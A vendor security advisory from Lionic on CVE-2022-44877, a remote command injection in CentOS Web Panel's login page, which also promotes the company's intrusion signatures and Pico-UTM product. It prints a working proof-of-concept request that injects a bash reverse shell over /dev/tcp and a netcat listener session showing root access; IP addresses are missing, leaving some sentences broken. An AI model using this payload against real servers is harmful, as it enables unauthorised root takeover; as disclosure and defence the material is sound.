Hsinchu, Taiwan – Feb 8, 2023CentOS Linux is widely used on servers, many of which are connected to the Internet. Some network administrators may use CWP, CentOS Web Panel, to manage their CentOS Linux installations. In December 2022, a serious vulnerability was found in CWP - CVE-2022-44877 - that allowed remote code execution. This made it highly likely that cybercriminals could exploit unpatched CentOS installations.

Proof of Concept

The CVE-2022-44877 vulnerability was located in the “/login/index.php?login” of CWP, which typically runs on ports 2030 or 2086 for HTTP and 2031 and 2087 for HTTPS. By sending a specially crafted HTTP request, an attacker could execute arbitrary commands on the affected system with root privileges.

Assumed the IP address of the example CentOS 7 server is The following HTTP request demonstrates how the vulnerability in CWP can be exploited to make the CWP connect to a remote server at IP address and TCP port 4444:

    POST /login/index.php?login=$(bash -i >& /dev/tcp/ 0>&1) HTTP/1.1
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en
    Connection: close


On the remote server, the attacker can use a tool such as NetCat (nc) to listen on TCP port 4444 and receive the incoming connection from the vulnerable CWP system. Once the connection is established, the attacker can execute arbitrary commands with root privileges on the vulnerable CWP system.

# nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
bash: no job control in this shell
[root@localhost login]# whoami
[root@localhost login]#

According to the above, CWP on server connected to NetCat on successfully. The result of executing the “whoami” command confirms that the attacker has gained root access of server.


This CVE-2022-44877 is considered critical due to its high severity level and can lead to serious security breaches.

CVE Id CVE Description CVSS v3 Score Severity Level Affected Software
CVE-2022-44877 login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter. 9.8 Critical CentOS 7, CWP version before


Lionic Actions

Lionic quickly responded to this CVE-2022-44877 by developing related anti-intrusion signatures.

Rule ID Description
8102309 Centos Web Panel 7 login Command Injection
8102310 Centos Web Panel 7 login Command Injection



Updating the software to the latest version is always the best method for fixing vulnerabilities. However, Lionic offers the Pico-UTM equipped with the latest signature as the “Virtual Bug Fix” solution. By using solutions like the Lionic Pico-UTM, they can stay protected and take their time to patch the systems.

It is important for network administrators to take cybersecurity seriously and stay up-to-date on vulnerabilities in their systems. Those network administrators who want to protect their servers without having to worry about constantly fixing vulnerabilities can adopted Pico-UTM.



  1. “CVE-2022-44877”, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44877
  2. “CVE-2022-44877”, https://nvd.nist.gov/vuln/detail/CVE-2022-44877
  3. “Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877”, https://github.com/numanturle/CVE-2022-44877
  4. “CVE-2022-44877”, https://attackerkb.com/topics/cvIPkChzTY/cve-2022-44877


About Lionic Corporation

Lionic Corporation is a worldwide provider of innovative Deep Packet Inspection solutions. The technologies of Lionic include the complete DPI-based software engine and related management software which offer the Security Solutions that addresses anti-virus, anti-intrusion, anti-webthreat; and the Content Management Solutions that addresses application identification, device identification, application based QoS, web content filtering, parental control.

Lionic’s security and content management solutions, cloud-based scan services and signature subscription service are widely deployed in the world already. They help service providers, network appliance manufacturers, semiconductor companies, etc. to enable the next generation of business routers, residential gateways, SD WAN edges and cloud gateways, advanced firewalls, UTMs, Smart NICs and mobile devices. Those products powered by Lionic provide better network management and protect the world’s networks from an ever increasing level of security threats.